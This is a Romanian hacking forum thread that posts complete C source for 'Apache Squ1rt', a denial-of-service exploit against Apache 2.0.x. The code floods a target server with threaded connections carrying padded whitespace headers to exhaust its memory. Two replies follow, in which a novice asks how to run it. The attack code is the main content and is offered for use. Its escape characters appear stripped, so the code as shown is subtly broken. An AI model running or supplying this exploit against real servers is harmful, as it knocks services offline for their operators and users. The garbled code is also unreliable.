Hacking and more...
HaCkinG CulT
Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.
Nou pe simpatie:
Tanya321
Femeie
24 ani
Giurgiu
cauta Barbat
24 - 63 ani
Hacking and more... / Exploituri si POCs / Apache Squ1rt, Denial of Service Proof of Concept Moderat de Shocker
Autor
Mesaj Pagini: 1
epic
User

Inregistrat: acum 17 ani
Postari: 1896


Code:

/* 
Apache Squ1rt, Denial of Service Proof of Concept 
Tested on Apache 2.0.52 

j0hnylightning gmail .om 
dguido gmail com 

Sends a request that starts with: 
GET / HTTP/1.0n 
8000 spaces n 
8000 spaces n 
8000 spaces n 
... 
8000 times 

Apache never kills it. Takes up huge amounts of 
RAM which increase with each connection. 

Original credit goes to Chintan Trivedi on the 
FullDisclosure mailing list: 
[seclists.org] 

More info: 
[www.cve.mitre.org] 

Versions between 2.0.35 and 2.0.52 may be vulnerable, 
but only down to 2.0.50 was tested. 

This attack may be preventable with a properly configured 
iptables ruleset. Gentoo already has a patch out in the 
2.0.52-r1 release in the file 06_all_gentoo_protocol.patch 

v2 
Rewritten to use pthread. 
gcc apache-squ1rt.c -lpthread 
*/ 

#include <stdio.h> 
#include <errno.h> 
#include <string.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <netdb.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <pthread.h> 
#define DEST_PORT 80 

void *squirtIt(char *hName); 

char attackBuf[8000]; 
char letsGetStarted[128]; 

int main(int argc, char **argv){ 
int num_connect; 
int ret; 
pthread_t tid[35]; 

sprintf(letsGetStarted, "GET / HTTP/1.0n"); 
memset(attackBuf, ' ', 8000); 
attackBuf[7998]='n'; 
attackBuf[7999]=''; 

if (argc != 2){ 
fprintf(stderr, "Usage: %s <host name> n", argv[0]); 
exit(1); 
} 

for(num_connect = 0; num_connect < 35; num_connect++){ 
ret = pthread_create(&tid[num_connect], NULL, (void *)squirtIt, argv[1]); 
} 

/* assuming any of these threads actually terminate, this waits for all of them */ 
for(num_connect = 0; num_connect < 35; num_connect++){ 
pthread_join(tid[num_connect], NULL); 
} 

return 0; 
} 

void *squirtIt(char *hName){ 
int sock, i; 
struct hostent *target; 
struct sockaddr_in addy; 

if((target = gethostbyname(hName)) == NULL){ 
herror("gethostbyname()"); 
exit(1); 
} 

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0){ 
perror("socket()"); 
exit(1); 
} 

addy.sin_family = AF_INET; 
addy.sin_port = htons(DEST_PORT); 
bcopy(target->h_addr, (char *)&addy.sin_addr, target->h_length ); 
memset(&(addy.sin_zero), '', 8); 

if((connect(sock, (struct sockaddr*)&addy, sizeof(addy))) < 0){ 
perror("connect()"); 
exit(1); 
} 

send(sock, letsGetStarted, strlen(letsGetStarted), 0); 

for(i=0; i < 8000; i++){ 
send(sock, attackBuf, strlen(attackBuf), 0); 
} 

close(sock); 
}



_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!

pus acum 17 ani
   
$-Geo-$
Master of 127.0.0.1

Inregistrat: acum 17 ani
Postari: 133
ma epic dar cum il folosesc ca am incercat in perl adika lam rulat in perl dar nu merge ,cum il folossesc?

pus acum 17 ani
   
DarkTempo
Elite Member

Inregistrat: acum 17 ani
Postari: 556
poti sa mai incerci in perl inca 10 vieti ca nu o sa iti mearga pentru ca e in C ......... analizeaza si tu un pic codul cu ocazia aia poate intelegi si cum functioneaza (daca cumva te intereseaza cum functioneaza ....... sau poate esti de ala care da drumu la un exploit care habar nu are cum functioneaza si gata esti hacker ) nu o lua in nume de rau ii numa un sfat

_______________________________________
admin edit: poza mai mare de 300 x 100 pixeli

pus acum 17 ani
   
Pagini: 1  

Mergi la